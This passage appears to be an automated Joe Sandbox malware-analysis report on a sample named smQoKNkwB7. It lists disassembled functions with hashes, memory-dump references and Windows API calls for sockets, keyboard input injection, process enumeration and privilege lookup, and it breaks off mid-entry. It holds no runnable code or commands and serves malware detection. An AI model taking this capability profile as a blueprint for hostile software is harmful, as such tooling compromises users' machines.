Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
Instruction ID: 389601f6fc1f4cb1bdbd8e8fbc89fb5b866a1cc452eb2dad1e11926623df0e08
Opcode Fuzzy Hash: dc259f4cbbb494e90cd547052a16e3503b0172a35200c7de05a446b18b4bf7bd
Instruction Fuzzy Hash: B4F05CF183162287D3750A306C18AAA33249F00701FA484ADFC09E2006DB70CDB08A92

Function 0024007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
Instruction ID: d094c95c6f6bef0bf2690fd7ec80a0e045ed9dae6804b49d68f62ba173feb598
Opcode Fuzzy Hash: b207000b89ba0f4c3a060addace7bfd41fc52ddc02fea898efd623f71c14c45c
Instruction Fuzzy Hash: 53C15D75A10206EFDB18CFA4C894EAEBBB5FF48704F108598E905EB251D771ED91CB90

Function 0026342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00263459
CoUninitialize.OLE32 ref: 00263463
VariantInit.OLEAUT32(?), ref: 0026346E
VariantClear.OLEAUT32(?), ref: 0026371B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 3518960e819564c220cc416eff9381b75bbe9e68c73dde89ac06e6e356b54112
Instruction ID: 8bf4a9dbc3d985486bf6344dbc05b9cd46597bf76c3bfcb566b3c91ab22bd2fc
Opcode Fuzzy Hash: 3518960e819564c220cc416eff9381b75bbe9e68c73dde89ac06e6e356b54112
Instruction Fuzzy Hash: 78A146752147019FD700DF29D885A2AB7E5FF88314F04885DF98A9B3A2DB30EE41CB92

Function 00240436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 002405F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0027FC08,?), ref: 00240608
CLSIDFromProgID.OLE32(?,?,00000000,0027CC40,000000FF,?,00000000,00000800,00000000,?,0027FC08,?), ref: 0024062D
_memcmp.LIBVCRUNTIME ref: 0024064E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
Instruction ID: 5cca81ca264c3a346f828425034b5afd4f9a25ee0fe76f56dfe36b2958221a8e
Opcode Fuzzy Hash: 6a5f9ef03c5c3f422724b6be5ff88072c347b6b2ebbc3304418f7b27327a174c
Instruction Fuzzy Hash: FB814C71A1010AEFCB04DF94C984EEEB7B9FF89315F204558E606AB250DB71AE46CF60

Function 00221391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002214C0

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
Instruction ID: 4716a2fdeb2cf9461426e2a633264a11e73e60b4de9c54372b7ccb6c59cd7c8d
Opcode Fuzzy Hash: ef0c34a6d987fdf1a16ed38f07dea4412fced34c1372494447b89c44af38ab8e
Instruction Fuzzy Hash: 1C412C31570225BADB217EF8AC46EAE3AA4EF61330F144266F81C96192D67448B19A61

Function 00276278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00B5E9B0,?), ref: 002762E2
ScreenToClient.USER32(?,?), ref: 00276315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00276382

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
Instruction ID: 631e006af55d018cbd8e20a834753d68ea8c754337cdde1089b4cbec3c41320a
Opcode Fuzzy Hash: b7d116cec8eeb78eed7c32ee4f2efb2c5f4d315e8c3dae55b76e15107f2951fd
Instruction Fuzzy Hash: 19515E70A1064AEFCF14DF64D8889AE7BB6FF45760F108299F81997290D730EDA1CB90

Function 00261AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00261AFD
WSAGetLastError.WSOCK32 ref: 00261B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00261B8A
WSAGetLastError.WSOCK32 ref: 00261B94

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
Instruction ID: ec71ebe4ac7ce847db45883d66a3ba733fdc6cb2452e2f778a820ed1488322c5
Opcode Fuzzy Hash: fb8c6d5dee5c3c54047390bb048dccd9f3a1e427499d5aa243e154804090cb87
Instruction Fuzzy Hash: 6441A434600601AFE7209F24D886F2977E5AB54718F58845CF61A9F3D3D771ED928B90

Function 0021B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4b277e6427606f7eba7d428c0aff7d2edf2dc2ee13bbbe506727b8e159c74e
Instruction ID: 91e98ebe4e1509588bb3ff2d2a4066419512987e4c76872b0ff15f44f2ab68d5
Opcode Fuzzy Hash: ed4b277e6427606f7eba7d428c0aff7d2edf2dc2ee13bbbe506727b8e159c74e
Instruction Fuzzy Hash: 13412A71A20314BFD7259F78CC41BAABBF9EB98710F10852EF501DB6C2D37199A18B80

Function 002556D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00255783
GetLastError.KERNEL32(?,00000000), ref: 002557A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002557CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002557FA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
Instruction ID: d63dc7b91918bca2af0920c2a15369d1aa1bc3fb36fed1d7ca89e48169d9bf45
Opcode Fuzzy Hash: 594d00ae16579497e87b90388a2a02373c94bac6263c27a32f9e1c5dec7cdf47
Instruction Fuzzy Hash: E7412C35600A51DFCB11DF15D444A1EBBE2EF99321B198488EC4AAB362CB30FD45CB91

Function 0021D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00206D71,00000000,00000000,002082D9,?,002082D9,?,00000001,00206D71,?,00000001,002082D9,002082D9), ref: 0021D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0021D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0021D9AB
__freea.LIBCMT ref: 0021D9B4

Part of subcall function 00213820: RtlAllocateHeap.NTDLL(00000000,?,002B1444,?,001FFDF5,?,?,001EA976,00000010,002B1440,001E13FC,?,001E13C6,?,001E1129), ref: 00213852

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
Instruction ID: 873750c58c3b3904cab41a1e8af7ee810f167638cdb96d9deb64956f19abb318
Opcode Fuzzy Hash: ef496cddcee78601cc6e2af2f147df64419d78f1f2ef111eff453bc69aff3341
Instruction Fuzzy Hash: 9B31AD72A2020AEBDB249F64DC45EEE7BE5EB50310B154169FC08D6291EB35DDA4CBA0

Function 002752C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00275352
GetWindowLongW.USER32(?,000000F0), ref: 00275375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00275382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002753A8

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
Instruction ID: 4898419d34dade9baa57abdd86211c876962ea792b59e9c377f64793c053df53
Opcode Fuzzy Hash: d2780a66ee8b5eed7f27987210fa70269bd2285a1bedeadd8979fbc3762e7056
Instruction Fuzzy Hash: 5C313730A75A2DEFEB349E24CC46FE9B765AB04390F54C181FA08921F0C3F0ADA09B41

Function 0024AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 0024ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0024AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0024AC74
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 0024ACC6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
Instruction ID: d0c540a1526c6ba68dcf584fd338297ca24bc05899123ca6f8473ff20b32ea0c
Opcode Fuzzy Hash: b1af08fc75631674077ef0dbf180e547f1173fc473b6e60e9efbefb7dc8928eb
Instruction Fuzzy Hash: 57313930AA071A6FEF3DCF64CC887FA7BA5AB89310F04431BE485571D0C37589A18792

Function 00277674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0027769A
GetWindowRect.USER32(?,?), ref: 00277710
PtInRect.USER32(?,?,00278B89), ref: 00277720
MessageBeep.USER32(00000000), ref: 0027778C

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
Instruction ID: 38ccef1b2aad87a531d6e506611abba0bc552ebbfe4cbd56a927eb8959ddf489
Opcode Fuzzy Hash: 0db3aae52f791fedb8fec428c1ea09603da67a0c8efa2c2b6a59862b641f9fef
Instruction Fuzzy Hash: 7D41AB34A15655EFCB09CF68D899EA9B7F5FB48304F54C1A8E8189B261C330A9A1CF90

Function 002716DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002716EB

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

GetCaretPos.USER32(?), ref: 002716FF
ClientToScreen.USER32(00000000,?), ref: 0027174C
GetForegroundWindow.USER32 ref: 00271752

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
Instruction ID: 876c66c1ac50775e36bee5330bf911dcd945a8952fa6d2d9ac1957ba69f7d7fd
Opcode Fuzzy Hash: f67ae44eab5bb603e1c61e5e8f3b01abe56441993bd6093d947aee6c1d7d30f2
Instruction Fuzzy Hash: 90316171D10149AFCB04EFAAC881CAEF7F9EF58304B508069E415E7251D7319E45CBA0

Function 0024D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
Process32NextW.KERNEL32(00000000,?), ref: 0024D52F
CloseHandle.KERNEL32(00000000), ref: 0024D5DC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
Instruction ID: cced23dfb6fd971c48cbf1ebcd151e687407e6adaf744d0119bf821f1185b5b2
Opcode Fuzzy Hash: c3656b4674ef86febc351d8a5969cf31f3e4850f9378b119cd5e1dd74e98e458
Instruction Fuzzy Hash: 6431C2711083419FD304EF64D885EAFBBF8EFA9344F90092DF585871A2EB719984CB92

Function 00278FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

GetCursorPos.USER32(?), ref: 00279001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00237711,?,?,?,?,?), ref: 00279016
GetCursorPos.USER32(?), ref: 0027905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00237711,?,?,?), ref: 00279094

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
Instruction ID: f7747360c2ad120fb25952daffd8fe5d06504635264f4202a32e637601739cc9
Opcode Fuzzy Hash: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
Instruction Fuzzy Hash: 4021BF35620118EFDB258FA4D859EFA3BF9FB89350F508169F90957261C33199A0DB60

Function 0024D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0027CB68), ref: 0024D2FB
GetLastError.KERNEL32 ref: 0024D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0024D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0027CB68), ref: 0024D376

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
Instruction ID: 9b155f56258634f69873ad9d51ec5aea7fe4cd6e02e9967a40f1a06c84e9089d
Opcode Fuzzy Hash: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
Instruction Fuzzy Hash: 1021BF705182029F8314DF38D88586EBBE4AF56324F204A9DF899C72A1D730DD56CF93

Function 00241571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
Part of subcall function 00241014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
Part of subcall function 00241014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
Part of subcall function 00241014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002415BE
_memcmp.LIBVCRUNTIME ref: 002415E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00241617
HeapFree.KERNEL32(00000000), ref: 0024161E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
Instruction ID: 7fb285ccbff27c846c853e7fc8595e292a335c304efa1f0fcec7ea997860106d
Opcode Fuzzy Hash: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
Instruction Fuzzy Hash: 1D21A171E10109EFDF08DFA4C949BEEB7B8EF44344F194459E445AB241D730EAA5CB90

Function 00272782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0027280A
